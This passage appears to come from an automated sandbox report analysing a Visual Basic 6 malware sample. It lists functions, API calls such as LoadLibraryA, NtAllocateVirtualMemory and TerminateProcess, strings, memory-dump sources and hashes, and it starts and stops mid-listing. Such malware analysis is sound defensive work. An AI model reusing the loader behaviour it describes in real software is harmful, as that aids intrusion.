__vbaStrToAnsi.MSVBVM60(?,Opdrage,00000000), ref: 00418329
__vbaSetSystemError.MSVBVM60(00000000), ref: 00418334
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041835B
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041837F
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 004183AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000118), ref: 004183D8
__vbaI2I4.MSVBVM60 ref: 004183DD
__vbaFreeObj.MSVBVM60 ref: 004183E6
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 004183F6
__vbaStrVarMove.MSVBVM60(?), ref: 00418400
__vbaStrMove.MSVBVM60 ref: 0041840B
__vbaFreeVar.MSVBVM60 ref: 0041841A
__vbaVarDup.MSVBVM60 ref: 00418430
#600.MSVBVM60(?,00000002), ref: 0041843C
__vbaFreeVar.MSVBVM60 ref: 00418447
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00418463
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00418488
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000068), ref: 004184A8
__vbaFreeObj.MSVBVM60 ref: 004184AD
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 004184C5
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 004184EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000070), ref: 0041850A
__vbaFreeObj.MSVBVM60 ref: 0041850F
__vbaFreeStr.MSVBVM60(00418551), ref: 0041854A

Strings

Chittamwood3, xrefs: 00418314
JAGTKONTROLLER, xrefs: 00418422
Lwo7, xrefs: 004182ED
Opdrage, xrefs: 00418320

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$AnsiNew2$Move$#539#600ErrorListSystem
String ID: Chittamwood3$JAGTKONTROLLER$Lwo7$Opdrage
API String ID: 3650663963-3611660698
Opcode ID: 9e67bf8537dc798f1141f9956a353e9ae27130d57b90e66e42c7530c3b253c9a
Instruction ID: 2b5b5341768e34583c5cf0f5350e6b9a6f0b216a1ad3d0f01bda19fb3256ae05
Opcode Fuzzy Hash: 9e67bf8537dc798f1141f9956a353e9ae27130d57b90e66e42c7530c3b253c9a
Instruction Fuzzy Hash: 0B715071D00209AFCB14EF95DD89EDEBBB8FF48700B10842AF515B71A0DA746945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 020B67FE, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

jv, xrefs: 020B69A0

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: jv
API String ID: 1029625771-1272767459
Opcode ID: a110fa788c64ac399e2161fc65d0b3368082bae153419cfbdaece8c3c8410391
Instruction ID: 9bc9273c194aef6f263fa841237e93efbec39acf99e221a2dce27b1d7f8d00fa
Opcode Fuzzy Hash: a110fa788c64ac399e2161fc65d0b3368082bae153419cfbdaece8c3c8410391
Instruction Fuzzy Hash: 7571AF7560130A8FDB32AF6884917ED77A3AFD8391F50412EAC158B268DB30C841EF51

Uniqueness

Uniqueness Score: -1.00%

Function 004015D0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015D5

Strings

VB5!6&*, xrefs: 004015D0

Memory Dump Source

Source File: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 331de4103517b47e0e9591873a55ce767acac9ae0cc6a10c2ade2e2b6f7f48e4
Instruction ID: 728d29efc16809dccf0d7728a94dde55940723815dc4b49563ae7792e93934c1
Opcode Fuzzy Hash: 331de4103517b47e0e9591873a55ce767acac9ae0cc6a10c2ade2e2b6f7f48e4
Instruction Fuzzy Hash: DD51A76644E7C14FD3038BB48C652A17FB0AE57228B1E0AEBC4C1DF4F3D269181AD726

Uniqueness

Uniqueness Score: -1.00%

Function 020B2641, Relevance: 1.7, APIs: 1, Instructions: 209libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Part of subcall function 020B5CB3: NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 5ca0b30a6fcf612213d91c79b474809ff6285c04c5148c6c178973062443109f
Instruction ID: 1ee35b02be37df00733a7821d9814d6b4fe3cde1b5cb64bc447c8b54c6b9f965
Opcode Fuzzy Hash: 5ca0b30a6fcf612213d91c79b474809ff6285c04c5148c6c178973062443109f
Instruction Fuzzy Hash: 016146326043459FDF329E68C895BEE73A3BF953A0F944129EC89CB260D734C981DA41

Uniqueness

Uniqueness Score: -1.00%

Function 020B76E8, Relevance: 1.7, APIs: 1, Instructions: 156libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 52694320c49c021dfc91af3b18784e8d5844ecb63b85ecfe0ea85123e812b176
Instruction ID: a49cbe755fd8d6af1109c8e5d77d3c930f7b2a462fa2de259344442986824498
Opcode Fuzzy Hash: 52694320c49c021dfc91af3b18784e8d5844ecb63b85ecfe0ea85123e812b176
Instruction Fuzzy Hash: 2D41C372648346DEDF379E148990BFEA2B6AFD9790F90402AEC4AC7635D3318D41EB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B1407, Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 911033f4461d5c11e1704d5c686aae21906a1ef1e00f6180a89a796f2d4458f4
Instruction ID: 9a427c4ce264ed53a44925e2fc495e65fe624de8222f671b8dff5dac7be68871
Opcode Fuzzy Hash: 911033f4461d5c11e1704d5c686aae21906a1ef1e00f6180a89a796f2d4458f4
Instruction Fuzzy Hash: B04158715087C59BDF338A388C583DEBBE2AF46320F95419ECC899B581D3744585DB92

Uniqueness

Uniqueness Score: -1.00%

Function 020B13C4, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00133b0bbb75dde20a5588bdf4db2858f1ba6826148d7ca8f1ba28a7c20c4b85
Instruction ID: 7059f4795bd1a3c5ae2485fe9782c65656d42b23486c52a8d4d810dea5c00629
Opcode Fuzzy Hash: 00133b0bbb75dde20a5588bdf4db2858f1ba6826148d7ca8f1ba28a7c20c4b85
Instruction Fuzzy Hash: 444169715097C59BDF338A388C583DEBBE2AF46310F95816ECC8997681C3744589DB92

Uniqueness

Uniqueness Score: -1.00%

Function 020B1437, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f9b0326482c9126264ffdfe407b88a23b5baee937e9c84348259156d8a2e45e4
Instruction ID: e473e9f9bb09201d49f51c737f6e0093bea7bbad9fd3af6822826d0f90670d8c
Opcode Fuzzy Hash: f9b0326482c9126264ffdfe407b88a23b5baee937e9c84348259156d8a2e45e4
Instruction Fuzzy Hash: 7B4177715087C59BDF339A3C88583EEBBE2AF06320F95819ECC8997681C3758585DB92

Uniqueness

Uniqueness Score: -1.00%

Function 020B147F, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 9133d92321b39fdccea35009f662f5e962cd45787eae87e16b4bc7992b381be3
Instruction ID: 538ae359501104b224aa0a651af6098439f71d465cf517b1a28ccee559c97477
Opcode Fuzzy Hash: 9133d92321b39fdccea35009f662f5e962cd45787eae87e16b4bc7992b381be3
Instruction Fuzzy Hash: 4D4175315097C59BDB338B3C88553DEBFA1AF07320F85429ADC898B681C3759588DB82

Uniqueness

Uniqueness Score: -1.00%

Function 020B6056, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f22fb1481f6fe5c1e3278d4e2180d3f7eab25e30e204533fca4fa3fa7da3bb6
Instruction ID: d7b081aa9e9de30fffe3f8524066a76ed36dd8c0b8569ac1c0d81071f16b1813
Opcode Fuzzy Hash: 3f22fb1481f6fe5c1e3278d4e2180d3f7eab25e30e204533fca4fa3fa7da3bb6
Instruction Fuzzy Hash: F13102355013459FEB339E68C890BEEB7AAEF593A0F50412AED89CB261C331C941EF51

Uniqueness

Uniqueness Score: -1.00%

Function 020B587B, Relevance: 1.6, APIs: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: 1034db4a3cce5bb0a2f33d02cfca50156dbd8fcecb457e00caa289993bbf057e
Instruction ID: f167f164b54e1ca19fe6b91624b74730a45b0bedb9aa08993f90046211b4969a
Opcode Fuzzy Hash: 1034db4a3cce5bb0a2f33d02cfca50156dbd8fcecb457e00caa289993bbf057e
Instruction Fuzzy Hash: D931077160A784CFDB33DF788C92AD9BFB2FF52304B9401D9D8818B112D220985AEF51

Uniqueness

Uniqueness Score: -1.00%

Function 020B55E6, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 020B5CB3: NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: c35ab9e75d26df4846a85867326039199d194e05fb374f3ce87113766e0f4bca
Instruction ID: 83c14a1af32403b012fc88c30392518e40123c7014cd28a44148cbd450a91d9a
Opcode Fuzzy Hash: c35ab9e75d26df4846a85867326039199d194e05fb374f3ce87113766e0f4bca
Instruction Fuzzy Hash: 5D21F6357043469FDF32AF788D947ED66A7AF853A0F94412EDC89CB6A4C7308841DE11

Uniqueness

Uniqueness Score: -1.00%

Function 020B14E8, Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 66d0734289e6acb367a90b5e5fc33ad7ae0828914a49c64c0a3a783a3d27f962
Instruction ID: cec430a51fd808df08379d5da63c0fac076d8a8557d9bf21dff1785c66143b74
Opcode Fuzzy Hash: 66d0734289e6acb367a90b5e5fc33ad7ae0828914a49c64c0a3a783a3d27f962
Instruction Fuzzy Hash: B93145725087C5ABDB338A3C8D583DEFFA26F47320F86419ACC8997A85C3755588C782

Uniqueness

Uniqueness Score: -1.00%

Function 020B1588, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: ed5a9a2d27e6e9ab07532f6835b3d8899baaa873cd6ad92909d5f135ea91e1f0
Instruction ID: 226cad10875d49f0400b80ed3cc285a233cb320a1a454afff8990000731edc61
Opcode Fuzzy Hash: ed5a9a2d27e6e9ab07532f6835b3d8899baaa873cd6ad92909d5f135ea91e1f0
Instruction Fuzzy Hash: 7B3169325093C59BDB324A3C89453DEFFA1AF07360F4681DEDCC56B981C3A5568AD382

Uniqueness

Uniqueness Score: -1.00%

Function 020B56AD, Relevance: 1.6, APIs: 1, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 020B5CB3: NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 4775a6166f4df54928e4ef6db1f0314a857e843f4210573a1361c0016b2e7def
Instruction ID: 1aa3890d114d7445b247b142da44feb3d36048e6288052e4f3647a0a472a175f
Opcode Fuzzy Hash: 4775a6166f4df54928e4ef6db1f0314a857e843f4210573a1361c0016b2e7def
Instruction Fuzzy Hash: B821F5756043459FDB32AF688C90BED67BAAF887A0F90442EEC98C7264C3718841DF51

Uniqueness

Uniqueness Score: -1.00%

Function 020B597B, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 880e407a193254324a517641a541f107bfd48be047620c72672a658d47091ca4
Instruction ID: 239a16ad37449a046656acef777ec8249498428c6e206302853f7de474d7cac6
Opcode Fuzzy Hash: 880e407a193254324a517641a541f107bfd48be047620c72672a658d47091ca4
Instruction Fuzzy Hash: 6321FF716083088FD7689F35CD957EBB7F2EF66350F91402D9DCA92A01E7715980CB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B673D, Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 36974e56d82cdaa2d7f7cfaf9e56b36f79c52b9e525c1621d2946b20423aea1d
Instruction ID: 424b885840ee54171becf5f75d286ed535321700dbb4649f783d9544f44d173d
Opcode Fuzzy Hash: 36974e56d82cdaa2d7f7cfaf9e56b36f79c52b9e525c1621d2946b20423aea1d
Instruction Fuzzy Hash: 2821D83420038A9FDF33AE64CC50BED26BABF447A0F50812AEC49DA564C7318940EF51

Uniqueness

Uniqueness Score: -1.00%

Function 020B152D, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: cee996f8fa26b5e3eb0d8834b7aa6d9ffb2bedb45c68cae1d1f1e2e68941bbc2
Instruction ID: c6eff8831724e3102e01d77ec9850fe11c88dae7c19f0ab94f9dd35773e992f5
Opcode Fuzzy Hash: cee996f8fa26b5e3eb0d8834b7aa6d9ffb2bedb45c68cae1d1f1e2e68941bbc2
Instruction Fuzzy Hash: 2B219A315097C5ABDB338A3C89493DEFFA2AF07360F86819ECC8567945C3B15589C782

Uniqueness

Uniqueness Score: -1.00%

Function 020B59AC, Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 179b0f07d5e06a00069802875ff8b2ac727b0826d168961355df371f01ddea1c
Instruction ID: 928c62a473023e013c256a5d40f124bf08f2ad2f77482a1830c67f3cca3c3d15
Opcode Fuzzy Hash: 179b0f07d5e06a00069802875ff8b2ac727b0826d168961355df371f01ddea1c
Instruction Fuzzy Hash: FF21DE726083048FD764DE39CCC2AEABBF6EF29350F81452D99C593A14E33059C0CB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B0839, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000), ref: 020B086E

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 0cbe427d48c02aecabbd6bfe385cd2e1d306519ef78a7cae39f1755d3e7ce08f
Instruction ID: 83a5469b82e667e50dc43d9b636baf935edf20b79521ad7b053c08827d8b3e16
Opcode Fuzzy Hash: 0cbe427d48c02aecabbd6bfe385cd2e1d306519ef78a7cae39f1755d3e7ce08f
Instruction Fuzzy Hash: AC1102356093488FEB309FB8C8917DB77A7EF2A310F814029E9C9C7A10D234DD859B02

Uniqueness

Uniqueness Score: -1.00%

Function 020B5A05, Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b61e1d69dbb4db4bb78ac46341db68d1d1a855032d4ba2f4222b54b3753f1be2
Instruction ID: 6595c401b0a119ed91d9a5c873c421886001edfec4d9be7c5a7a370458187927
Opcode Fuzzy Hash: b61e1d69dbb4db4bb78ac46341db68d1d1a855032d4ba2f4222b54b3753f1be2
Instruction Fuzzy Hash: 5401ED31609304CFE720EE7988C66EABBB2EF26350F91806C99C683415E7616884CB22

Uniqueness

Uniqueness Score: -1.00%

Function 020B7CAD, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 19f935bcdeceed454a1097f1523f4b3aa8b76f87bedb6760eb29b10d2c38c3ef
Instruction ID: f7a726f8dcde8824e1fbc079ebe5b81e0abba65747bb944c4623af1fd21dec42
Opcode Fuzzy Hash: 19f935bcdeceed454a1097f1523f4b3aa8b76f87bedb6760eb29b10d2c38c3ef
Instruction Fuzzy Hash: 930188346013469FEB32AE688C907ED66BAAF847E0F90402AEC58CA6A5C735C9419E51

Uniqueness

Uniqueness Score: -1.00%

Function 020B5ACF, Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4a01c9fa489988418475f7a40c997adbeed87ea4623a1b6d4f6d6144931bcb3
Instruction ID: a345d664a2609d6900feb4bb687532f1948e5693fea5dfec07774d496feccb97
Opcode Fuzzy Hash: d4a01c9fa489988418475f7a40c997adbeed87ea4623a1b6d4f6d6144931bcb3
Instruction Fuzzy Hash: 8D016D715043498BD735AE30DDC56ED7BE0EF6B3A0F99089ED8C1A7911D3601989CB00

Uniqueness

Uniqueness Score: -1.00%

Function 020B7CE8, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d01641060a43dd41ef8b82265c335f940f103908544ff41ca9c397d39932ea83
Instruction ID: 41e33f7e030d4996e7855953c3eea0e81051e079ed599b992a3df3a291f40dc8
Opcode Fuzzy Hash: d01641060a43dd41ef8b82265c335f940f103908544ff41ca9c397d39932ea83
Instruction Fuzzy Hash: BEF0E025503704AFDF337A988C507ECA3767F807F1F904116F480865B4C725C881AE42

Uniqueness

Uniqueness Score: -1.00%

Function 020B5A4F, Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e3d84456cc3d57531de25a5ee74366b69ca478ebf9c40b6d781c52849d10824b
Instruction ID: dbe8472f1e4860d65bb41d4539cf84d1e6d830891e83246360e19abb75b51553
Opcode Fuzzy Hash: e3d84456cc3d57531de25a5ee74366b69ca478ebf9c40b6d781c52849d10824b
Instruction Fuzzy Hash: 35F06D72A49319DFD720AE3A89456EABAF2EF5A3A0F91446D9CC582418E77015C0CA62

Uniqueness

Uniqueness Score: -1.00%

Function 020B57B4, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 210b3e424a6b9fcc32c0ed8e0eed9b9262b5bcd9bfd41d0126b8889503cc56ac
Instruction ID: 7890fd52def9b42fc97151c6afc9d3625c4ff62d88bdf8104768ccf809653d27
Opcode Fuzzy Hash: 210b3e424a6b9fcc32c0ed8e0eed9b9262b5bcd9bfd41d0126b8889503cc56ac
Instruction Fuzzy Hash: C9F05977A0201C0BDF305E248E81BCAB7B76BAA250F170025DC8577E40C370DE8A8781

Uniqueness

Uniqueness Score: -1.00%

Function 020B7D37, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 57b3c3d5302fe4ae0489e713a0d8091b751b795f6eb931f7eec061f16278b66c
Instruction ID: 3105c6a33a53193209f9a98fdeddd3555ddb9b8b12a55e7c39de45785f9cef6d
Opcode Fuzzy Hash: 57b3c3d5302fe4ae0489e713a0d8091b751b795f6eb931f7eec061f16278b66c
Instruction Fuzzy Hash: 5BD09721200A28EF4B333F2489042DCF732BE80FE1FD08006E8904812CC3B499839F80

Uniqueness

Uniqueness Score: -1.00%

Function 020B581B, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: ac32c6bce137532dd1b76a2eaab9db5381c343ea50a56ad7e6ea388e6629db13
Instruction ID: f594cd2c53f1d69c237ac23e890ce3a3f5525c4cd796ae2c3ad8107f6eff766f
Opcode Fuzzy Hash: ac32c6bce137532dd1b76a2eaab9db5381c343ea50a56ad7e6ea388e6629db13
Instruction Fuzzy Hash: E8C012377020088FCF20DF5CCC8AA8533A8AB14209F088040AD8AE3220C770EC008B40

Uniqueness

Uniqueness Score: -1.00%

Function 020B5AEE, Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fa8de1879b1ed90965036ef17457d64969c42d95ba429e3d664e3d95b1d2b755
Instruction ID: bdec72672d8331a083cb7439321b591f5cee4eb1fc7d7682b941471fc837c9b4
Opcode Fuzzy Hash: fa8de1879b1ed90965036ef17457d64969c42d95ba429e3d664e3d95b1d2b755
Instruction Fuzzy Hash: 17B09230909781EFCB228F308415A8EBAA1BFA1300B06C04B94AA8544287308428D724

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020B6253, Relevance: 2.8, Strings: 2, Instructions: 254COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: Du#$b
API String ID: 2167126740-3254798933
Opcode ID: e89b8fde7d4de03648a1137826bf5578f6b68d6a79d82cdcb06546533226531d
Instruction ID: 206f0c1691a4f0a6f6c2da177adc5d58f25a7f400b4c5c813efcedcc01975b4c
Opcode Fuzzy Hash: e89b8fde7d4de03648a1137826bf5578f6b68d6a79d82cdcb06546533226531d
Instruction Fuzzy Hash: D091E17168434ACFDF759E748DA47EF77A6EF52390F85402ACC8A9B510E3328981DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B62A4, Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Du#$b
API String ID: 0-3254798933
Opcode ID: 90e3eaa17945cb8902d6f7c450ec3ba89e9f70fcee89a119b735ac515892ee36
Instruction ID: 5eb8bff84fcf680ff99d331f145b4fccdff8af61be747c1609ed96354880b858
Opcode Fuzzy Hash: 90e3eaa17945cb8902d6f7c450ec3ba89e9f70fcee89a119b735ac515892ee36
Instruction Fuzzy Hash: 7F910F7168434ACFDB719E74CDA47EE77E6AF52390F85402ECC8A9B510E3328981DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B630B, Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
